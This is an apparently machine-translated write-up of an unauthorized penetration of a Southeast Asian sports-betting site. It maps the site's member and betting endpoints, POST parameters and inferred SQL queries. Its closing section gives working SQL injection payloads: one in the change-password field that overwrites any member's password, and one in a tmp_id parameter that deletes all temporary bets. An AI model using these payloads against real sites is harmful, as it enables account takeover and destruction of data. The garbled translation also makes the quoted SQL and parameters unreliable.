A penetration into a station in Southeast Asia

# After login, the UID is reassigned and the user name and password are also passed.
It is estimated that there will be a data table dedicated to storing the data.
# Possible data table structure:
Createtableloginuid (
Uidchar (16 ),
Idinteger,
Usernamevarchar (30 ),
Timedatetime
);

/APP/member/chk_rule.php? Mtype = & uid = 1c2c91396a7f1966
# Mtype does not seem to be a required parameter, and does not play any role.
#ProgramQuery uid. If it is illegal, return to the home page

/APP/member/ft_header.php? Uid = 1c2c91396a7f1966 & showtype = & mtype = 3
# Display the top menu. The following parameters are not required, including uid

/APP/member/select. php? Uid = 1c2c91396a7f1966 & mtype = 3
# The leftmost user information area. The UID must be valid.

Football

/APP/member/ft_index.php? Uid = 1c2c91396a7f1966 & langx = ZH-tw & mtype = 3
# After Entering, football is displayed by default. mtype does not seem to have any effect.

/APP/member/ft_browse/index. php? Uid = 1c2c91396a7f1966
# Single-field Rtype = r

/JS/ft_mem_showgame.js
# This seems to be a bet, used to generate a page in the left Information bar
/APP/member/ft_browse/body_var.php
# It is actually an HTML that generates arrays and is useful for future research.
/APP/member/ft_browse/body_browse.php? Uid = 109dc631978b8b0 & Rtype = r
# Displays the information of a single field, but it seems that uid is not required

# Go to the ground: Same as a single field, only Rtype = Re
# Boldlike: Just like a single game, just Rtype = Pd
# AUTUMN: Rtype = T

# Standard pass (Rtype = P) and pass (Rtype = Pr)

Bet:
/APP/member/ft_order/ft_order_m.php? Gid = 843 & uid = 2017dc631978b8b0 & type = H & gnum = 301
# Create a betting page
# GID and gnum are defined in the body_var array.

/APP/member/ft_order/ft_order_m.php
# Handling betting Information
# Post:

Gold = 60 & uid = 109dc631978b8b0 & active = 1 & line_type = 3 & gid = 843 & type = C & gnum =
301 & concede_h = 1 & radio_h = 100 & ioradio_r_h = 6.60 & gmax_single = 30000 & gmin _
Single = 50 & singlecredit = 1000 & singleorder = 500 & restsinglecredit =
0 & wagerstotal = 1000 & restcredit = 1000 & pay_type = 0

# SQL: selectfl, FID, posfromft_followwheregid = '$ gid'
# SQL: Select * fromft_paramwhereltype = $ line_typeandgid = $ gidandrtype = '$ Rtype'
# SQL: insertintowagersou (gtype, wtype, CID, Sid, aid, mid,
Code, code_value, pay_type, winloss_s,
Winloss_a, gold, gold_d, GID, gnum, strong, type, concede, ratio, ioratio, result,
Orderdate, adddate, wingold, wratio_c, wratio_s, wratio_a, wratio_m, wgold_c,
Wgold_s, wgold_a, wgold_m) values ('ft ', 'M', '7', '26', '123456',' RMB ', '1 ',
'0', '000000', '30', '$ gold', '5. 00', '$ gid',' $ gnum ', '', 'C', '1', '000000',' $ ioradio_r
_ H ', '0', '2017-03-10', '2017-03-100', '0', '95', '95 ',
'95', '000000', '0', '0', '0', '0 ')

/APP/member/ft_order/ft_order_p.php
# Generate a temporary bet
# Post:

Game_id1 = 844 & game1 = H & game_id2 = 846 & game2 = H & game_id3 = 847 & game3 =
H & game_id4 = 848 & game_id5 = 849 & game_id6 = 845 & game_id7 = 850 & teamcount =
7 & active = 1 & uid = 6defa21b702a5d87 & team0310 = % C8 % B7 % C8 % cf

# SQL: selectfl, FID, posfromft_followwheregid = '$ game_id1'
# SQL: selectioratiofromft_paramwheregid = '000000' andrtype ='m $ game1'

/APP/member/ft_order/ft_order_pr.php? Active = 3 & uid =
Export dc631978b8b0 & tmp_id = 76507 & pdate =
# Delete a temporary bet. Note tmp_id.

# SQL: deletefromwagers_tmpwhereid = $ tmp_id

/APP/member/ft_order/ft_order_pr_finish.php
# Handle multiple bets
# Post:

Wkind = S & wstar = 3 & Gold = 50 & uid = 109dc631978b8b0 & active = 1 & teamcount =
3 & amp; username = caa1307 & amp; singlecredit = 1000 & amp; singleorder = 500 & amp; gmin_single =
50 & gmax_single = 500 & restcredit = 854 & wagerstotal =
0 & pay_type = 0 & SC = 0 + 0 + 0 + & pdate = 2004-03-10

# SQL: selectid, gold, code_valuefromwagerspwheremid = login and
Star = $ teamcountandrtype = 'pr' andgtype = 'ft'

/APP/member/result. php? Game_type = ft & uid = 109dc631978b8b0
# Competition Results
# Post: game_type = ft & today = 2004-03-10 & submit = % B2 % E9 % D1 % af
# SQL: selectid, name_c, name_g, name_efrom $ game_type_leagues
# SQL: Select * from $ game_typewhereleague_id = '000000' anddate = '$ today'
Andgame_over = 'y' orderbynum _ c

Member information:
/APP/member/account/mem_data.php? Uid = 109dc631978b8b0
# Member information, uid must be valid

/APP/member/account/chg_passwd.php? Uid = 109dc631978b8b0
# Change Password

/APP/member/account/chg_passwd.php? Uid = 109dc631978b8b0
# Process password information when action = 1
# Post: Password = ice3y3 & Action = 1 & uid = 109dc631978b8b0
# SQL: updatememberssetpassword = PASSWORD ('$ password '),
Passwd = '$ password' whereid = '000000'
# Note: Members. Password is the encrypted password, passwd is the plaintext, and ID is calculated based on the UID.

# Structure: updatememberssetpassword = PASSWORD ('$ password '),
Passwd = '$ password' whereid = '000000'

**************************************** ************

Program Analysis:

Login:
# SQL: selectid, username, typefrommemberswhereusername = '$ username'
Andpassword = PASSWORD ('$ password') and 'enabled' = 'y'

It verifies members. Password, which is the encrypted password field, rather than the plaintext password field.
So we only need to modify members. Password to change the password.
Via/APP/member/account/chg_passwd.php? Uid = 109dc631978b8b0 modify
# SQL: updatememberssetpassword = PASSWORD ('$ password'), passwd ='
$ Password 'whereid = '000000'
# Because 'is replaced with \' and \ is replaced with \, the password we modified must contain \ characters.
# $ Password = newpwd ') whereid = ID /*
# After system processing, it will eventually become: $ Password = newpwd \ ') whereid = ID /*
# Import SQL:
# SQL: updatememberssetpassword = PASSWORD ('newpwd \\')
Whereid = ID/* '), passwd = 'newpwd \') whereid = ID/* 'whereid = '000000'
# Equivalent to SQL: updatememberssetpassword = PASSWORD ('newpwd \ ') whereid = ID
# The ID can be any number.

Delete temporary bets:
/APP/member/ft_order/ft_order_pr.php? Active = 3 & uid = 109dc631978b8b0 & tmp_id
= 76507 & pdate =
# Delete a temporary bet. Note tmp_id.
# SQL: deletefromwagers_tmpwhereid = $ tmp_id
# $ Tmp_id = 1or1 = 1 /*
# SQL: deletefromwagers_tmpwhereid = 1or1 = 1
# Result: All temporary bets are deleted.

//////////////////////////////////////// ///// All rights reserved for iceeye, please refer